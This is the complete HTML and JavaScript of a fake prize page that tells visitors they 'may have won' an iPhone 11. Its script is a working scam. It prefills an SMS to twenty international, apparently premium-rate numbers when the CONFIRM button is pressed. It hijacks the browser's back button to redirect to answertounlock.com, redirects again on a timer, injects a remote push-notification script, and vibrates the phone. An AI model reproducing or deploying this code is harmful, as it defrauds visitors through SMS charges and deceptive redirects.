<!DOCTYPE html><html>
<head>
	<title>Get a Gift  | Iphone Winners</title>
	<link rel="icon" type="image/ico" href="/dummy-favicon.ico">
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="theme-color" content="#ffffff">
	<style>
		*,html{box-sizing:border-box}
		body{background-color:#fff;font-family:"Calibri","helvetica",sans-serif;margin:0}
		a,a:hover{
			text-decoration:none;outline:0
		}
		.mb-0{margin-bottom:0}
		@keyframes vitrate{
			0%{transform:scale(1)}
			50%{transform:scale(0.95)}
			100%{transform:scale(1)}
			}
		@-webkit-keyframes vitrate{
			0%{transform:scale(1)}
			50%{transform:scale(0.95)}
			100%{transform:scale(1)}
		}
		header{
			color:#fff;background:#303F9F;padding:5px 10px;display:flex;align-items:center;font-family:sans-serif
		}
		.container-fluid{
			display:flex
		}
		.app-body,.hero-section{
			width:100%;text-align:center;float:left
		}
		.app-body{
			height:100vh;width:400px;margin:0 auto;padding-bottom:50px;background-color:#fff
		}
		h1{
			font-size:50px;line-height:10px;font-weight:400
		}
		.hero-section{
			background-color:#3F51B5;color:#fff;box-shadow:0 2px 6px rgba(0,0,0,.2);margin-bottom:2vh;border-top:10px solid #313c77;height:45vh
		}
		.button{
			width:80%;
			margin:auto;
			margin-top:1vh;
			margin-bottom:0;
			min-height:1px;
			padding:15px 20px;
			border-radius:5px;
			font-stretch:normal;
			font-size:20px;
			line-height:normal;
			background-color:#CDDC39;
			text-align:center;
			color:#3a3636;
			font-family:sans-serif;
			animation:vitrate 1s infinite;
			cursor:pointer;border:0;
			box-shadow:0 0 6px rgba(0,0,0,.2)
		}
		.prize-wrp img{
			max-width:250px
		}
		.prize-wrp{
			text-align:center;
			margin-top:3vh;
			float:left;
			width:100%;
			position:relative
		}
		.v-code{
			background:#fff;
			color:#333;
			padding:5px 10px;
			font-weight:600;
			width:70px;
		}
		.app-footer{
			position:fixed;
			bottom:0;
			text-align:center;
			padding:5px;
			background:#333;
			color:#fff;
			width:400px;
			left:50%;
			transform:translate(-50%,-0%)
		}
		.band{
			position:absolute;
			bottom:0;
			left:50%;
			width:120px
		}
		.prize-con{
			opacity:0;
			transform:scale(0);
			position:relative;
			transition:all .5s ease-in
		}
		.prize-con.show-prize{
			opacity:1;
			transform:scale(1)
		}
		.loader{
			color:#137a17;
			font-size:90px;
			text-indent:-9999em;
			overflow:hidden;
			width:1em;
			height:1em;
			border-radius:50%;
			margin:72px auto;
			position:relative;
			-webkit-transform:translateZ(0);
			-ms-transform:translateZ(0);
			transform:translateZ(0);
			-webkit-animation:load6 1.7s infinite ease,round 1.7s infinite ease;
			animation:load6 1.7s infinite ease,round 1.7s infinite ease;
			position:absolute;left:calc(50% - 40px);top:calc(30% - 40px)
		}
		@-webkit-keyframes load6{
			0%{box-shadow:0 -.83em 0 -0.4em,0 -.83em 0 -0.42em,0 -.83em 0 -0.44em,0 -.83em 0 -0.46em,0 -.83em 0 -.477em}
			5%,95%{box-shadow:0 -.83em 0 -0.4em,0 -.83em 0 -0.42em,0 -.83em 0 -0.44em,0 -.83em 0 -0.46em,0 -.83em 0 -.477em}
			10%,59%{box-shadow:0 -.83em 0 -0.4em,-.087em -.825em 0 -0.42em,-.173em -.812em 0 -0.44em,-.256em -.789em 0 -0.46em,-.297em -.775em 0 -.477em}
			20%{box-shadow:0 -.83em 0 -0.4em,-.338em -.758em 0 -0.42em,-.555em -.617em 0 -0.44em,-.671em -.488em 0 -0.46em,-.749em -.34em 0 -.477em}
			38%{box-shadow:0 -.83em 0 -0.4em,-.377em -.74em 0 -0.42em,-.645em -.522em 0 -0.44em,-.775em -.297em 0 -0.46em,-.82em -.09em 0 -.477em}
			100%{box-shadow:0 -.83em 0 -0.4em,0 -.83em 0 -0.42em,0 -.83em 0 -0.44em,0 -.83em 0 -0.46em,0 -.83em 0 -.477em}
		}
		@keyframes load6{
			0%{box-shadow:0 -.83em 0 -0.4em,0 -.83em 0 -0.42em,0 -.83em 0 -0.44em,0 -.83em 0 -0.46em,0 -.83em 0 -.477em}
			5%,95%{box-shadow:0 -.83em 0 -0.4em,0 -.83em 0 -0.42em,0 -.83em 0 -0.44em,0 -.83em 0 -0.46em,0 -.83em 0 -.477em}
			10%,59%{box-shadow:0 -.83em 0 -0.4em,-.087em -.825em 0 -0.42em,-.173em -.812em 0 -0.44em,-.256em -.789em 0 -0.46em,-.297em -.775em 0 -.477em}
			20%{box-shadow:0 -.83em 0 -0.4em,-.338em -.758em 0 -0.42em,-.555em -.617em 0 -0.44em,-.671em -.488em 0 -0.46em,-.749em -.34em 0 -.477em}
			38%{box-shadow:0 -.83em 0 -0.4em,-.377em -.74em 0 -0.42em,-.645em -.522em 0 -0.44em,-.775em -.297em 0 -0.46em,-.82em -.09em 0 -.477em}
			100%{box-shadow:0 -.83em 0 -0.4em,0 -.83em 0 -0.42em,0 -.83em 0 -0.44em,0 -.83em 0 -0.46em,0 -.83em 0 -.477em}
			}
		@-webkit-keyframes round{
			0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}
			100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}
		}
		@keyframes round{
			0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}
			100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}
		}
		.link{
			color:#fff;font-size:14px
		}
		
		@media (orientation: landscape) and (max-width: 767px){
			.app-body{height:auto}
		}
		@media(max-width: 767px){
			.container-fluid{
				display:block
			}
			.app-body{
				width:100%
			}
			.hero-section{
				height:auto;
				margin-bottom:0
			}
			.app-footer{
				width:100%;
				left:0;
				transform:translate(-0%,-0%)
			}
			.prize-wrp img{
				max-width:48vw
			}
			.xbox-one img, .nintendo-switch img{
				max-width: 75vw;
			}
		}
		
		@media(max-width: 360px){
			.prize-wrp img{max-width:120px}
			.xbox-one img, .nintendo-switch img{max-width:200px}
			.app-footer,.link{font-size: 13px;}
		}
		
		body.ar{direction: rtl;}
		</style>
	</head>
	<body class="en">
		<div class="container-fluid">
			<section class="app-body">
				<div class="hero-section">
					<p class="mb-0"><b>Congratulations you may have won a:</b></p>
					<h1 class="prize-name">iPhone 11</h1>
					<p>Your delivery code is</p>
					<p><span class="v-code">000000</span></p>
					<div class="button-wrp">
						<button class="button" id="send-sms">CONFIRM</button>
					</div>
					<p>Send code to confirm participation.</p>
				</div>
				<div class="prize-wrp">
					<div class="loader"></div>
					<div class="prize-con iphone">
						<img class="prize" src="https://1673333600.rsc.cdn77.org/images/iphone11.png" alt="">
						<img class="band" src="https://1673333600.rsc.cdn77.org/images/band.png" alt="">
					</div>
				</div>
			</section>
			<footer class="app-footer">
				&copy; 
				<span>Giveaway - About GiveAway -  </span>
				<a class="link" href="/privacypolicy" target="_blank">Privacy Policy</a>
			</footer>
			<div class="backbutton">
				<a id="backbtn" href="#iphone">&nbsp;</a>
			</div>
		</div>
	</body>
	<script src="https://code.jquery.com/jquery-3.4.1.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
	<script>
	function ajax_call(a,t,l="GET"){
		return $.ajax(
			{
				type:l,
				url:a,
				data:t
			}
		)
	}
	</script>
	<script>
	var pm_pid = "17426-bd675840";
	let numbers='+37270098522,+447364000685,+393194005028,+79856553001,+243809700128,+886903079238,+35845712232,+6746660496,+8818460109,+327700090000797,+12645385163,+6783334097,+32467411234,+31632600585,+967709000371,+447406560188,+447924801316,+4915555009260,+67574993649,+41742790311',
	gift = 'iphone',
	ukid = ""
	winmsg = "" || '';

	let offerList = {
		iphone: { name: "iPhone 11", image: "iphone11.png"},
		ipadair: {name: "iPad Air", image: "ipad-air.png"},
		'xbox-one': {name: "Xbox One", image: "xbox-one.jpg"},
		'nintendo-switch': {name: "Nintendo Switch", image: "nintendo-switch.jpg"}
	}			

	function generateUkid(e = "message") {
		ajax_call("/chat-key", {
			pageid: "1682",
			relation: "5795",
			action: "sms",
			avid: "105",
			uuid: "ee67b510-cb55-4d6a-adf3-144c5c3c0077",
			pl: "91",
			plid: "91",
			isp: "-",
			loc: "LT",
			oukid: ""
		}, "POST").done(function(a) {
			ukid = a.key, "message" == e ? becreative(ukid) : "redirect" == e && redirecting()
		})
	}

	function sendmessage(){
		ukid?becreative(ukid):generateUkid()
	}
	function redirecting(){
		window.location.href="https://answertounlock.com/1742?ukid="+ukid
	}
	
	window.addEventListener("hashchange", function(e) {
		e.oldURL.length > e.newURL.length && (ukid ? redirecting(ukid) : generateUkid("redirect"))
	});

	function becreative(ukey) {
		let sendtext = 'Verification code is: ' +"#" + ukey + " "+ winmsg;
		if (navigator.userAgent.match(/iPhone|iPad|iPod|Mac/i))
			window.location.href ="sms://open?addresses=" + numbers + "/&body=" + encodeURIComponent(sendtext);
		else
			window.location.href ="sms:" + numbers.replace(/,/g, ";") + "?body=" + encodeURIComponent(sendtext);
		setTimeout(function(){
			window.location.href = 'http://answertounlock.com/1889?ukid='+ ukid;
		},5000)
	} 

	function renderPrize(){
		$("#backbtn")[0].click();
		$('.prize-name').html(offerList[gift].name);
		$('.prize').attr('src', 'https://1673333600.rsc.cdn77.org/images/' + offerList[gift].image)
	}
	window.onload = function(){
		window.focus(); 
		setTimeout(()=> navigator.vibrate(200), 2000)
		setTimeout(()=> navigator.vibrate(200), 15000);
	}
	$(document).ready(function () {
		let verifyCode = Math.floor(100000 + Math.random() * 900000);
		$('.v-code').html(verifyCode);
		renderPrize(gift);
		setTimeout(() => {
			$('.loader').hide(() => {
				$('.prize-con').addClass('show-prize');
			})
		}, 2000);
		$('body').on('click', '#send-sms', function () {sendmessage()});

		if(location.protocol == 'https:'){
			var s = document.createElement("script");
			s.type = "text/javascript";
			s.src = "//push.answertounlock.com/js/pub.min.js";
			s.setAttribute("async", "true");
			document.body.appendChild(s)
		}
	});
	</script>
</html>